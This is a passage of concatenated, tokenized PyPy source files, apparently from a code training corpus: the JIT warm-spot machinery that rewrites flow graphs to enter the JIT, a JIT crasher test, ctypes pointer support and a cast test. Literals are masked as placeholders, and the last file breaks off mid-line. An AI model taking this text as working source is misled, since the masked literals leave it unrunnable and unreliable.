            return res * <NUM_LIT:2>
        res = self.meta_interp(f, [<NUM_LIT:6>, <NUM_LIT:7>, <NUM_LIT:2>])
        assert res == <NUM_LIT>
        profiler = pyjitpl._warmrunnerdesc.metainterp_sd.profiler
        assert profiler.calls == [[<NUM_LIT:0>, <NUM_LIT:1>], [<NUM_LIT:0>, <NUM_LIT:0>], [<NUM_LIT:0>, <NUM_LIT:1>]]
# Warm-spot machinery: finds the jit_merge_point / can_enter_jit markers in
# the flow graphs, splits out a "portal" graph, and rewires the program so
# that hot loops enter the JIT.  (Literals masked by tokenization; hedged
# comments mark where meanings are inferred.)
import sys
from pypy.rpython.lltypesystem import lltype, llmemory, rclass, rstr
from pypy.rpython.ootypesystem import ootype
from pypy.rpython.annlowlevel import llhelper, MixLevelHelperAnnotator, cast_base_ptr_to_instance, hlstr
from pypy.annotation import model as annmodel
from pypy.rpython.llinterp import LLException
from pypy.rpython.test.test_llinterp import get_interpreter, clear_tcache
from pypy.objspace.flow.model import SpaceOperation, Variable, Constant
from pypy.objspace.flow.model import checkgraph, Link, copygraph
from pypy.rlib.objectmodel import we_are_translated
from pypy.rlib.unroll import unrolling_iterable
from pypy.rlib.rarithmetic import r_uint, intmask
from pypy.rlib.debug import debug_print
from pypy.rpython.lltypesystem.lloperation import llop
from pypy.translator.simplify import get_funcobj, get_functype
from pypy.translator.unsimplify import call_final_function
from pypy.jit.metainterp import codewriter
from pypy.jit.metainterp import support, history, pyjitpl, gc
from pypy.jit.metainterp.pyjitpl import MetaInterpStaticData, MetaInterp
from pypy.jit.metainterp.policy import JitPolicy
from pypy.jit.metainterp.typesystem import LLTypeHelper, OOTypeHelper
from pypy.jit.metainterp.jitprof import Profiler, EmptyProfiler
from pypy.rlib.jit import DEBUG_STEPS, DEBUG_DETAILED, DEBUG_OFF, DEBUG_PROFILE


def apply_jit(translator, backend_name="<STR_LIT>", debug_level=DEBUG_STEPS,
              inline=False,
              **kwds):
    """Attach a JIT to an already-built *translator* (translation-time entry)."""
    # Key masked -- presumably 'CPUClass'; auto-detect when absent.
    if '<STR_LIT>' not in kwds:
        from pypy.jit.backend.detect_cpu import getcpuclass
        kwds['<STR_LIT>'] = getcpuclass(backend_name)
    if debug_level > DEBUG_OFF:
        ProfilerClass = Profiler
    else:
        ProfilerClass = EmptyProfiler
    warmrunnerdesc = WarmRunnerDesc(translator,
                                    translate_support_code=True,
                                    listops=True,
                                    no_stats=True,
                                    ProfilerClass=ProfilerClass,
                                    **kwds)
    warmrunnerdesc.state.set_param_inlining(inline)
    warmrunnerdesc.state.set_param_debug(debug_level)
    warmrunnerdesc.finish()
    translator.warmrunnerdesc = warmrunnerdesc


def ll_meta_interp(function, args, backendopt=False, type_system='<STR_LIT>',
                   listcomp=False, **kwds):
    """Test entry point: interpret *function* on the llinterp with a JIT."""
    if listcomp:
        extraconfigopts = {'<STR_LIT>': True}
    else:
        extraconfigopts = {}
    interp, graph = get_interpreter(function, args,
                                    backendopt=False,  # done later if asked
                                    type_system=type_system,
                                    **extraconfigopts)
    clear_tcache()
    return jittify_and_run(interp, graph, args, backendopt=backendopt, **kwds)


def jittify_and_run(interp, graph, args, repeat=<NUM_LIT:1>,
                    backendopt=False, trace_limit=sys.maxint,
                    debug_level=DEBUG_STEPS, inline=False, **kwds):
    # Build the warm runner with low thresholds (suitable for tests), run
    # the graph, optionally repeat and check the result is stable.
    translator = interp.typer.annotator.translator
    translator.config.translation.gc = "<STR_LIT>"
    warmrunnerdesc = WarmRunnerDesc(translator, backendopt=backendopt, **kwds)
    warmrunnerdesc.state.set_param_threshold(<NUM_LIT:3>)
    warmrunnerdesc.state.set_param_trace_eagerness(<NUM_LIT:2>)
    warmrunnerdesc.state.set_param_trace_limit(trace_limit)
    warmrunnerdesc.state.set_param_inlining(inline)
    warmrunnerdesc.state.set_param_debug(debug_level)
    warmrunnerdesc.finish()
    res = interp.eval_graph(graph, args)
    if not kwds.get('<STR_LIT>', False):
        warmrunnerdesc.metainterp_sd.profiler.finish()
    print '<STR_LIT>', res
    while repeat > <NUM_LIT:1>:
        print '<STR_LIT>' * <NUM_LIT>
        res1 = interp.eval_graph(graph, args)
        if isinstance(res, int):
            assert res1 == res
        repeat -= <NUM_LIT:1>
    return res


def rpython_ll_meta_interp(function, args, backendopt=True,
                           loops='<STR_LIT>', **kwds):
    # Like ll_meta_interp but with the support code translated as well.
    return ll_meta_interp(function, args, backendopt=backendopt,
                          translate_support_code=True, **kwds)


def _find_jit_marker(graphs, marker_name):
    # Collect every (graph, block, op-index) whose operation is the given
    # jit marker hint.
    results = []
    for graph in graphs:
        for block in graph.iterblocks():
            for i in range(len(block.operations)):
                op = block.operations[i]
                if (op.opname == '<STR_LIT>' and
                    op.args[<NUM_LIT:0>].value == marker_name):
                    results.append((graph, block, i))
    return results


def find_can_enter_jit(graphs):
    results = _find_jit_marker(graphs, '<STR_LIT>')
    if not results:
        raise Exception("<STR_LIT>")
    return results


def find_jit_merge_point(graphs):
    # Exactly one jit_merge_point is required in the whole program.
    results = _find_jit_marker(graphs, '<STR_LIT>')
    if len(results) != <NUM_LIT:1>:
        raise Exception("<STR_LIT>" %
                        (len(results),))
    return results[<NUM_LIT:0>]


def find_set_param(graphs):
    return _find_jit_marker(graphs, '<STR_LIT>')


def get_stats():
    return pyjitpl._warmrunnerdesc.stats


def get_translator():
    return pyjitpl._warmrunnerdesc.translator


def debug_checks():
    stats = get_stats()
    stats.maybe_view()
    stats.check_consistency()


class JitException(Exception):
    # Base for control-flow exceptions that must escape the llinterp.
    _go_through_llinterp_uncaught_ = True

class ContinueRunningNormallyBase(JitException):
    pass

class CannotInlineCanEnterJit(JitException):
    pass


class WarmRunnerDesc:
    # Orchestrates the whole JIT hookup: portal extraction, bytecode
    # generation, and graph rewriting.

    def __init__(self, translator, policy=None, backendopt=True, CPUClass=None,
                 optimizer=None, **kwds):
        pyjitpl._warmrunnerdesc = self   # global handle used by tests/stats
        if policy is None:
            policy = JitPolicy()
        self.set_translator(translator)
        self.find_portal()
        self.make_leave_jit_graph()
        self.codewriter = codewriter.CodeWriter(self.rtyper)
        graphs = self.codewriter.find_all_graphs(self.portal_graph,
                                                 self.leave_graph,
                                                 policy,
                                                 CPUClass.supports_floats)
        policy.dump_unsafe_loops()
        self.check_access_directly_sanity(graphs)
        if backendopt:
            self.prejit_optimizations(policy, graphs)
        self.build_meta_interp(CPUClass, **kwds)
        self.make_args_specification()
        self.rewrite_jit_merge_point(policy)
        self.make_driverhook_graphs()
        if self.jitdriver.virtualizables:
            from pypy.jit.metainterp.virtualizable import VirtualizableInfo
            self.metainterp_sd.virtualizable_info = VirtualizableInfo(self)
        self.codewriter.generate_bytecode(self.metainterp_sd,
                                          self.portal_graph,
                                          self.leave_graph,
                                          self.portal_runner_ptr
                                          )
        self.make_enter_function()
        self.rewrite_can_enter_jit()
        self.rewrite_set_param()
        self.add_profiler_finish()
        self.metainterp_sd.finish_setup(optimizer=optimizer)

    def finish(self):
        # Late finalization once all graphs are in place.
        vinfo = self.metainterp_sd.virtualizable_info
        if vinfo is not None:
            vinfo.finish()
        if self.cpu.translate_support_code:
            self.annhelper.finish()

    def _freeze_(self):
        # RPython hint: this instance is a translation-time constant.
        return True

    def set_translator(self, translator):
        self.translator = translator
        self.rtyper = translator.rtyper
        self.gcdescr = gc.get_description(translator.config)

    def find_portal(self):
        """Locate the jit_merge_point and split out a copy of its graph as
        the 'portal' graph, starting right at the merge point."""
        graphs = self.translator.graphs
        self.jit_merge_point_pos = find_jit_merge_point(graphs)
        graph, block, pos = self.jit_merge_point_pos
        op = block.operations[pos]
        args = op.args[<NUM_LIT:2>:]
        s_binding = self.translator.annotator.binding
        self.portal_args_s = [s_binding(v) for v in args]
        graph = copygraph(graph)
        graph.startblock.isstartblock = False
        graph.startblock = support.split_before_jit_merge_point(
            *find_jit_merge_point([graph]))
        graph.startblock.isstartblock = True
        checkgraph(graph)
        for v in graph.getargs():
            assert isinstance(v, Variable)
        # No duplicate argument variables allowed.
        assert len(dict.fromkeys(graph.getargs())) == len(graph.getargs())
        self.translator.graphs.append(graph)
        self.portal_graph = graph
        assert hasattr(graph, "<STR_LIT>")
        graph.func._dont_inline_ = True
        graph.func._jit_unroll_safe_ = True
        self.jitdriver = block.operations[pos].args[<NUM_LIT:1>].value

    def check_access_directly_sanity(self, graphs):
        # Graphs outside the JIT must not carry the (masked) access-directly
        # attribute checked below.
        from pypy.translator.backendopt.inline import collect_called_graphs
        jit_graphs = set(graphs)
        for graph in collect_called_graphs(self.translator.graphs[<NUM_LIT:0>],
                                           self.translator):
            if graph in jit_graphs:
                continue
            assert not getattr(graph, '<STR_LIT>', False)

    def prejit_optimizations(self, policy, graphs):
        from pypy.translator.backendopt.all import backend_optimizations
        backend_optimizations(self.translator,
                              graphs=graphs,
                              merge_if_blocks=True,
                              constfold=True,
                              raisingop2direct_call=False,
                              remove_asserts=True,
                              really_remove_asserts=True)

    def build_meta_interp(self, CPUClass, translate_support_code=False,
                          view="<STR_LIT>", no_stats=False,
                          ProfilerClass=EmptyProfiler, **kwds):
        assert CPUClass is not None
        opt = history.Options(**kwds)
        if no_stats:
            stats = history.NoStats()
        else:
            stats = history.Stats()
        self.stats = stats
        if translate_support_code:
            self.annhelper = MixLevelHelperAnnotator(self.translator.rtyper)
            annhelper = self.annhelper
        else:
            annhelper = None
        cpu = CPUClass(self.translator.rtyper, self.stats,
                       translate_support_code, gcdescr=self.gcdescr)
        self.cpu = cpu
        self.metainterp_sd = MetaInterpStaticData(self.portal_graph,
                                                  cpu,
                                                  self.stats, opt,
                                                  ProfilerClass=ProfilerClass,
                                                  warmrunnerdesc=self)

    def make_enter_function(self):
        """Build maybe_enter_jit(), the function called at every
        can_enter_jit site; JIT crashes are reported, not propagated."""
        from pypy.jit.metainterp.warmstate import WarmEnterState
        state = WarmEnterState(self)
        maybe_compile_and_run = state.make_entry_point()
        self.state = state

        def crash_in_jit(e):
            if not we_are_translated():
                print "<STR_LIT>"
                print '<STR_LIT>' % (e.__class__, e)
                # Drop into pdb only when stdout has not been redirected.
                if sys.stdout == sys.__stdout__:
                    import pdb; pdb.post_mortem(sys.exc_info()[<NUM_LIT:2>])
                raise
            debug_print('<STR_LIT>')
            debug_print('<STR_LIT>' % (e,))
            raise history.CrashInJIT("<STR_LIT>")
        crash_in_jit._dont_inline_ = True

        if self.translator.rtyper.type_system.name == '<STR_LIT>':
            # (branch selected by masked type-system name -- TODO confirm
            #  which one wraps with the crash handler)
            def maybe_enter_jit(*args):
                try:
                    maybe_compile_and_run(*args)
                except JitException:
                    raise       # go through, these control the interpreter
                except Exception, e:
                    crash_in_jit(e)
            maybe_enter_jit._always_inline_ = True
        else:
            def maybe_enter_jit(*args):
                maybe_compile_and_run(*args)
            maybe_enter_jit._always_inline_ = True
        self.maybe_enter_jit_fn = maybe_enter_jit

    def make_leave_jit_graph(self):
        # Annotate the jitdriver's optional `leave` hook, if any.
        self.leave_graph = None
        if self.jitdriver.leave:
            args_s = self.portal_args_s
            from pypy.annotation import model as annmodel
            annhelper = MixLevelHelperAnnotator(self.translator.rtyper)
            s_result = annmodel.s_None
            self.leave_graph = annhelper.getgraph(self.jitdriver.leave,
                                                  args_s, s_result)
            annhelper.finish()

    def make_driverhook_graphs(self):
        # Annotate the optional jitdriver hooks and keep delayed funcptrs.
        from pypy.rlib.jit import BaseJitCell
        bk = self.rtyper.annotator.bookkeeper
        classdef = bk.getuniqueclassdef(BaseJitCell)
        s_BaseJitCell_or_None = annmodel.SomeInstance(classdef,
                                                      can_be_None=True)
        s_BaseJitCell_not_None = annmodel.SomeInstance(classdef)
        s_Str = annmodel.SomeString()
        annhelper = MixLevelHelperAnnotator(self.translator.rtyper)
        self.set_jitcell_at_ptr = self._make_hook_graph(
            annhelper, self.jitdriver.set_jitcell_at, annmodel.s_None,
            s_BaseJitCell_not_None)
        self.get_jitcell_at_ptr = self._make_hook_graph(
            annhelper, self.jitdriver.get_jitcell_at, s_BaseJitCell_or_None)
        self.can_inline_ptr = self._make_hook_graph(
            annhelper, self.jitdriver.can_inline, annmodel.s_Bool)
        self.get_printable_location_ptr = self._make_hook_graph(
            annhelper, self.jitdriver.get_printable_location, s_Str)
        annhelper.finish()

    def _make_hook_graph(self, annhelper, func, s_result, s_first_arg=None):
        # Hooks take the green args (plus an optional leading extra arg).
        if func is None:
            return None
        extra_args_s = []
        if s_first_arg is not None:
            extra_args_s.append(s_first_arg)
        args_s = self.portal_args_s[:len(self.green_args_spec)]
        graph = annhelper.getgraph(func, extra_args_s + args_s, s_result)
        funcptr = annhelper.graph2delayed(graph)
        return funcptr

    def make_args_specification(self):
        # Split the merge-point arguments into green/red specs and build the
        # function types for the enter and portal functions.
        graph, block, index = self.jit_merge_point_pos
        op = block.operations[index]
        args = op.args[<NUM_LIT:2>:]
        ALLARGS = []
        self.green_args_spec = []
        self.red_args_types = []
        for i, v in enumerate(args):
            TYPE = v.concretetype
            ALLARGS.append(TYPE)
            if i < len(self.jitdriver.greens):
                self.green_args_spec.append(TYPE)
            else:
                self.red_args_types.append(history.getkind(TYPE))
        self.num_green_args = len(self.green_args_spec)
        RESTYPE = graph.getreturnvar().concretetype
        (self.JIT_ENTER_FUNCTYPE,
         self.PTR_JIT_ENTER_FUNCTYPE) = self.cpu.ts.get_FuncType(ALLARGS, lltype.Void)
        (self.PORTAL_FUNCTYPE,
         self.PTR_PORTAL_FUNCTYPE) = self.cpu.ts.get_FuncType(ALLARGS, RESTYPE)

    def rewrite_can_enter_jit(self):
        # Replace every can_enter_jit hint (outside the portal graph) with a
        # direct call to maybe_enter_jit.
        FUNC = self.JIT_ENTER_FUNCTYPE
        FUNCPTR = self.PTR_JIT_ENTER_FUNCTYPE
        jit_enter_fnptr = self.helper_func(FUNCPTR, self.maybe_enter_jit_fn)
        graphs = self.translator.graphs
        can_enter_jits = find_can_enter_jit(graphs)
        for graph, block, index in can_enter_jits:
            if graph is self.jit_merge_point_pos[<NUM_LIT:0>]:
                continue
            op = block.operations[index]
            greens_v, reds_v = decode_hp_hint_args(op)
            args_v = greens_v + reds_v
            vlist = [Constant(jit_enter_fnptr, FUNCPTR)] + args_v
            v_result = Variable()
            v_result.concretetype = lltype.Void
            newop = SpaceOperation('<STR_LIT>', vlist, v_result)
            block.operations[index] = newop

    def helper_func(self, FUNCPTR, func):
        # Wrap *func* as a low-level function pointer; goes through the
        # mix-level annotator when support code is being translated.
        if not self.cpu.translate_support_code:
            return llhelper(FUNCPTR, func)
        FUNC = get_functype(FUNCPTR)
        args_s = [annmodel.lltype_to_annotation(ARG) for ARG in FUNC.ARGS]
        s_result = annmodel.lltype_to_annotation(FUNC.RESULT)
        graph = self.annhelper.getgraph(func, args_s, s_result)
        return self.annhelper.graph2delayed(graph, FUNC)

    def rewrite_jit_merge_point(self, policy):
        """Replace the original jit_merge_point with a call to the portal
        runner, which loops on the JIT's control-flow exceptions."""
        origportalgraph = self.jit_merge_point_pos[<NUM_LIT:0>]
        portalgraph = self.portal_graph
        PORTALFUNC = self.PORTAL_FUNCTYPE
        portal_ptr = self.cpu.ts.functionptr(PORTALFUNC, '<STR_LIT>',
                                             graph=portalgraph)
        self.portal_ptr = portal_ptr
        portalfunc_ARGS = unrolling_iterable(
            [(i, '<STR_LIT>' % i, ARG) for i, ARG in enumerate(PORTALFUNC.ARGS)])

        # One exception class per result kind, raised by the JIT to unwind
        # back into ll_portal_runner below.
        class DoneWithThisFrameVoid(JitException):
            def __str__(self):
                return '<STR_LIT>'

        class DoneWithThisFrameInt(JitException):
            def __init__(self, result):
                assert lltype.typeOf(result) is lltype.Signed
                self.result = result
            def __str__(self):
                return '<STR_LIT>' % (self.result,)

        class DoneWithThisFrameRef(JitException):
            def __init__(self, cpu, result):
                assert lltype.typeOf(result) == cpu.ts.BASETYPE
                self.result = result
            def __str__(self):
                return '<STR_LIT>' % (self.result,)

        class DoneWithThisFrameFloat(JitException):
            def __init__(self, result):
                assert lltype.typeOf(result) is lltype.Float
                self.result = result
            def __str__(self):
                return '<STR_LIT>' % (self.result,)

        class ExitFrameWithExceptionRef(JitException):
            def __init__(self, cpu, value):
                assert lltype.typeOf(value) == cpu.ts.BASETYPE
                self.value = value
            def __str__(self):
                return '<STR_LIT>' % (self.value,)

        class ContinueRunningNormally(ContinueRunningNormallyBase):
            # Carries the unwrapped portal arguments, one attribute per arg.
            def __init__(self, argboxes):
                from pypy.jit.metainterp.warmstate import unwrap
                for i, name, ARG in portalfunc_ARGS:
                    v = unwrap(ARG, argboxes[i])
                    setattr(self, name, v)
            def __str__(self):
                return '<STR_LIT>' % (
                    '<STR_LIT:U+002CU+0020>'.join(map(str, self.args)),)

        self.DoneWithThisFrameVoid = DoneWithThisFrameVoid
        self.DoneWithThisFrameInt = DoneWithThisFrameInt
        self.DoneWithThisFrameRef = DoneWithThisFrameRef
        self.DoneWithThisFrameFloat = DoneWithThisFrameFloat
        self.ExitFrameWithExceptionRef = ExitFrameWithExceptionRef
        self.ContinueRunningNormally = ContinueRunningNormally
        self.metainterp_sd.DoneWithThisFrameVoid = DoneWithThisFrameVoid
        self.metainterp_sd.DoneWithThisFrameInt = DoneWithThisFrameInt
        self.metainterp_sd.DoneWithThisFrameRef = DoneWithThisFrameRef
        self.metainterp_sd.DoneWithThisFrameFloat = DoneWithThisFrameFloat
        self.metainterp_sd.ExitFrameWithExceptionRef = ExitFrameWithExceptionRef
        self.metainterp_sd.ContinueRunningNormally = ContinueRunningNormally
        rtyper = self.translator.rtyper
        RESULT = PORTALFUNC.RESULT
        result_kind = history.getkind(RESULT)
        ts = self.cpu.ts

        def ll_portal_runner(*args):
            # Loop forever: each ContinueRunningNormally restarts the portal
            # with fresh arguments; the Done* exceptions return the result.
            while <NUM_LIT:1>:
                try:
                    return support.maybe_on_top_of_llinterp(rtyper,
                                                            portal_ptr)(*args)
                except ContinueRunningNormally, e:
                    args = ()
                    for _, name, _ in portalfunc_ARGS:
                        v = getattr(e, name)
                        args = args + (v,)
                except DoneWithThisFrameVoid:
                    assert result_kind == '<STR_LIT>'
                    return
                except DoneWithThisFrameInt, e:
                    assert result_kind == '<STR_LIT:int>'
                    return lltype.cast_primitive(RESULT, e.result)
                except DoneWithThisFrameRef, e:
                    assert result_kind == '<STR_LIT>'
                    return ts.cast_from_ref(RESULT, e.result)
                except DoneWithThisFrameFloat, e:
                    assert result_kind == '<STR_LIT:float>'
                    return e.result
                except ExitFrameWithExceptionRef, e:
                    value = ts.cast_to_baseclass(e.value)
                    if not we_are_translated():
                        raise LLException(ts.get_typeptr(value), value)
                    else:
                        value = cast_base_ptr_to_instance(Exception, value)
                        raise Exception, value

        self.portal_runner_ptr = self.helper_func(self.PTR_PORTAL_FUNCTYPE,
                                                  ll_portal_runner)
        # Rewrite the original merge-point op into a call to the runner and
        # make its block return the runner's result directly.
        _, origblock, origindex = self.jit_merge_point_pos
        op = origblock.operations[origindex]
        assert op.opname == '<STR_LIT>'
        assert op.args[<NUM_LIT:0>].value == '<STR_LIT>'
        greens_v, reds_v = decode_hp_hint_args(op)
        vlist = [Constant(self.portal_runner_ptr, self.PTR_PORTAL_FUNCTYPE)]
        vlist += greens_v
        vlist += reds_v
        v_result = Variable()
        v_result.concretetype = PORTALFUNC.RESULT
        newop = SpaceOperation('<STR_LIT>', vlist, v_result)
        del origblock.operations[origindex:]
        origblock.operations.append(newop)
        origblock.exitswitch = None
        origblock.recloseblock(Link([v_result], origportalgraph.returnblock))
        checkgraph(origportalgraph)

    def add_profiler_finish(self):
        # When translating support code, flush the profiler at process exit.
        def finish_profiler():
            if self.metainterp_sd.profiler.initialized:
                self.metainterp_sd.profiler.finish()
        if self.cpu.translate_support_code:
            call_final_function(self.translator, finish_profiler,
                                annhelper=self.annhelper)

    def rewrite_set_param(self):
        # Turn every set_param hint into a direct call to a per-parameter
        # closure that forwards to the warm state's setter.
        closures = {}
        graphs = self.translator.graphs
        _, PTR_SET_PARAM_FUNCTYPE = self.cpu.ts.get_FuncType([lltype.Signed],
                                                             lltype.Void)
        def make_closure(fullfuncname):
            state = self.state
            def closure(i):
                getattr(state, fullfuncname)(i)
            funcptr = self.helper_func(PTR_SET_PARAM_FUNCTYPE, closure)
            return Constant(funcptr, PTR_SET_PARAM_FUNCTYPE)
        for graph, block, i in find_set_param(graphs):
            op = block.operations[i]
            assert op.args[<NUM_LIT:1>].value == self.jitdriver
            funcname = op.args[<NUM_LIT:2>].value
            if funcname not in closures:
                # Prefix masked -- presumably 'set_param_'; TODO confirm.
                closures[funcname] = make_closure('<STR_LIT>' + funcname)
            op.opname = '<STR_LIT>'
            op.args[:<NUM_LIT:3>] = [closures[funcname]]


def decode_hp_hint_args(op):
    """Split a jit hint op's args into (greens, reds), dropping Voids."""
    assert op.opname == '<STR_LIT>'
    jitdriver = op.args[<NUM_LIT:1>].value
    numgreens = len(jitdriver.greens)
    numreds = len(jitdriver.reds)
    greens_v = op.args[<NUM_LIT:2>:<NUM_LIT:2> + numgreens]
    reds_v = op.args[<NUM_LIT:2> + numgreens:]
    assert len(reds_v) == numreds
    return ([v for v in greens_v if v.concretetype is not lltype.Void],
            [v for v in reds_v if v.concretetype is not lltype.Void])
<s> import os <EOL> import py <EOL> from pypy . jit . tl . test import jitcrashers <EOL> path = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT:..>" , "<STR_LIT>" ) <EOL> JIT_EXECUTABLE = py . path . local ( path ) <EOL> del path <EOL> CRASH_FILE = os . path . abspath ( jitcrashers . __file__ . rstrip ( "<STR_LIT:c>" ) ) <EOL> if not JIT_EXECUTABLE . check ( ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> def setup_module ( mod ) : <EOL> mod . _old_cwd = os . getcwd ( ) <EOL> os . chdir ( str ( JIT_EXECUTABLE . dirpath ( ) ) ) <EOL> def teardown_module ( mod ) : <EOL> os . chdir ( mod . _old_cwd ) <EOL> def check_crasher ( func_name ) : <EOL> try : <EOL> JIT_EXECUTABLE . sysexec ( CRASH_FILE , func_name ) <EOL> except py . __ . process . cmdexec . ExecutionFailed , e : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print e . err <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print e . out <EOL> raise <EOL> def test_jit_crashers ( ) : <EOL> for func_name in sorted ( jitcrashers . __dict__ ) : <EOL> if func_name . startswith ( "<STR_LIT>" ) : <EOL> yield check_crasher , func_name </s>
<s> import _rawffi <EOL> from _ctypes . basics import _CData , _CDataMeta , cdata_from_address <EOL> from _ctypes . basics import sizeof , byref , keepalive_key <EOL> from _ctypes . array import Array , array_get_slice_params , array_slice_getitem , array_slice_setitem <EOL> DEFAULT_VALUE = object ( ) <EOL> class PointerType ( _CDataMeta ) : <EOL> def __new__ ( self , name , cls , typedict ) : <EOL> d = dict ( <EOL> size = _rawffi . sizeof ( '<STR_LIT:P>' ) , <EOL> align = _rawffi . alignment ( '<STR_LIT:P>' ) , <EOL> length = <NUM_LIT:1> , <EOL> _ffiargshape = '<STR_LIT:P>' , <EOL> _ffishape = '<STR_LIT:P>' , <EOL> _fficompositesize = None <EOL> ) <EOL> obj = type . __new__ ( self , name , cls , typedict ) <EOL> for k , v in d . iteritems ( ) : <EOL> setattr ( obj , k , v ) <EOL> if '<STR_LIT>' in typedict : <EOL> self . set_type ( obj , typedict [ '<STR_LIT>' ] ) <EOL> else : <EOL> def __init__ ( self , value = None ) : <EOL> raise TypeError ( "<STR_LIT>" % obj ) <EOL> obj . __init__ = __init__ <EOL> return obj <EOL> def from_param ( self , value ) : <EOL> if value is None : <EOL> return self ( None ) <EOL> if isinstance ( value , self . _type_ ) : <EOL> return byref ( value ) <EOL> if isinstance ( value , ( _Pointer , Array ) ) : <EOL> if issubclass ( type ( value ) . _type_ , self . _type_ ) : <EOL> return value <EOL> return _CDataMeta . from_param ( self , value ) <EOL> def _sizeofinstances ( self ) : <EOL> return _rawffi . sizeof ( '<STR_LIT:P>' ) <EOL> def _alignmentofinstances ( self ) : <EOL> return _rawffi . alignment ( '<STR_LIT:P>' ) <EOL> def _is_pointer_like ( self ) : <EOL> return True <EOL> def set_type ( self , TP ) : <EOL> ffiarray = _rawffi . Array ( '<STR_LIT:P>' ) <EOL> def __init__ ( self , value = None ) : <EOL> self . _buffer = ffiarray ( <NUM_LIT:1> , autofree = True ) <EOL> if value is not None : <EOL> self . contents = value <EOL> self . _ffiarray = ffiarray <EOL> self . __init__ = __init__ <EOL> self . 
_type_ = TP <EOL> from_address = cdata_from_address <EOL> class _Pointer ( _CData ) : <EOL> __metaclass__ = PointerType <EOL> def getcontents ( self ) : <EOL> addr = self . _buffer [ <NUM_LIT:0> ] <EOL> if addr == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return self . _type_ . from_address ( addr ) <EOL> def setcontents ( self , value ) : <EOL> if not isinstance ( value , self . _type_ ) : <EOL> raise TypeError ( "<STR_LIT>" % ( <EOL> self . _type_ . __name__ , type ( value ) . __name__ ) ) <EOL> self . _objects = { keepalive_key ( <NUM_LIT:1> ) : value } <EOL> if value . _ensure_objects ( ) is not None : <EOL> self . _objects [ keepalive_key ( <NUM_LIT:0> ) ] = value . _objects <EOL> value = value . _buffer <EOL> self . _buffer [ <NUM_LIT:0> ] = value <EOL> _get_slice_params = array_get_slice_params <EOL> _slice_getitem = array_slice_getitem <EOL> def _subarray ( self , index = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> address = self . _buffer [ <NUM_LIT:0> ] <EOL> address += index * sizeof ( self . _type_ ) <EOL> return self . _type_ . from_address ( address ) . _buffer <EOL> def __getitem__ ( self , index ) : <EOL> if isinstance ( index , slice ) : <EOL> return self . _slice_getitem ( index ) <EOL> return self . _type_ . _CData_output ( self . _subarray ( index ) , self , index ) <EOL> def __setitem__ ( self , index , value ) : <EOL> self . _subarray ( index ) [ <NUM_LIT:0> ] = self . _type_ . _CData_value ( value ) <EOL> def __nonzero__ ( self ) : <EOL> return self . _buffer [ <NUM_LIT:0> ] != <NUM_LIT:0> <EOL> contents = property ( getcontents , setcontents ) <EOL> def _cast_addr ( obj , _ , tp ) : <EOL> if not ( isinstance ( tp , _CDataMeta ) and tp . _is_pointer_like ( ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> % ( tp , ) ) <EOL> if isinstance ( obj , Array ) : <EOL> ptr = tp . __new__ ( tp ) <EOL> ptr . _buffer = tp . _ffiarray ( <NUM_LIT:1> , autofree = True ) <EOL> ptr . _buffer [ <NUM_LIT:0> ] = obj . 
_buffer <EOL> return ptr <EOL> if isinstance ( obj , ( int , long ) ) : <EOL> result = tp ( ) <EOL> result . _buffer [ <NUM_LIT:0> ] = obj <EOL> return result <EOL> if obj is None : <EOL> result = tp ( ) <EOL> return result <EOL> if not ( isinstance ( obj , _CData ) and type ( obj ) . _is_pointer_like ( ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> % ( type ( obj ) , ) ) <EOL> result = tp ( ) <EOL> result . _buffer [ <NUM_LIT:0> ] = obj . _buffer [ <NUM_LIT:0> ] <EOL> return result </s>
<s> from ctypes import * <EOL> import sys , py <EOL> from support import BaseCTypesTestChecker <EOL> def setup_module ( mod ) : <EOL> import conftest <EOL> mod . lib = CDLL ( str ( conftest . sofile ) ) <EOL> class TestCast ( BaseCTypesTestChecker ) : <EOL> def test_array2pointer ( self ) : <EOL> array = ( c_int * <NUM_LIT:3> ) ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ) <EOL> ptr = cast ( array , POINTER ( c_int ) ) <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:3> ) ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> if <NUM_LIT:2> * sizeof ( c_short ) == sizeof ( c_int ) : <EOL> ptr = cast ( array , POINTER ( c_short ) ) <EOL> if sys . byteorder == "<STR_LIT>" : <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:6> ) ] == ( <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> ] ) <EOL> else : <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:6> ) ] == ( <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> def test_address2pointer ( self ) : <EOL> array = ( c_int * <NUM_LIT:3> ) ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ) <EOL> address = addressof ( array ) <EOL> ptr = cast ( c_void_p ( address ) , POINTER ( c_int ) ) <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:3> ) ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> ptr = cast ( address , POINTER ( c_int ) ) <EOL> assert [ ptr [ i ] for i in range ( <NUM_LIT:3> ) ] == [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] <EOL> def test_p2a_objects ( self ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> array = ( c_char_p * <NUM_LIT:5> ) ( ) <EOL> assert array . _objects is None <EOL> array [ <NUM_LIT:0> ] = "<STR_LIT>" <EOL> assert array . _objects == { '<STR_LIT:0>' : "<STR_LIT>" } <EOL> p = cast ( array , POINTER ( c_char_p ) ) <EOL> assert p . _objects is array . _objects <EOL> assert array . _objects == { '<STR_LIT:0>' : "<STR_LIT>" , id ( array ) : array } <EOL> p [ <NUM_LIT:0> ] = "<STR_LIT>" <EOL> assert p . 
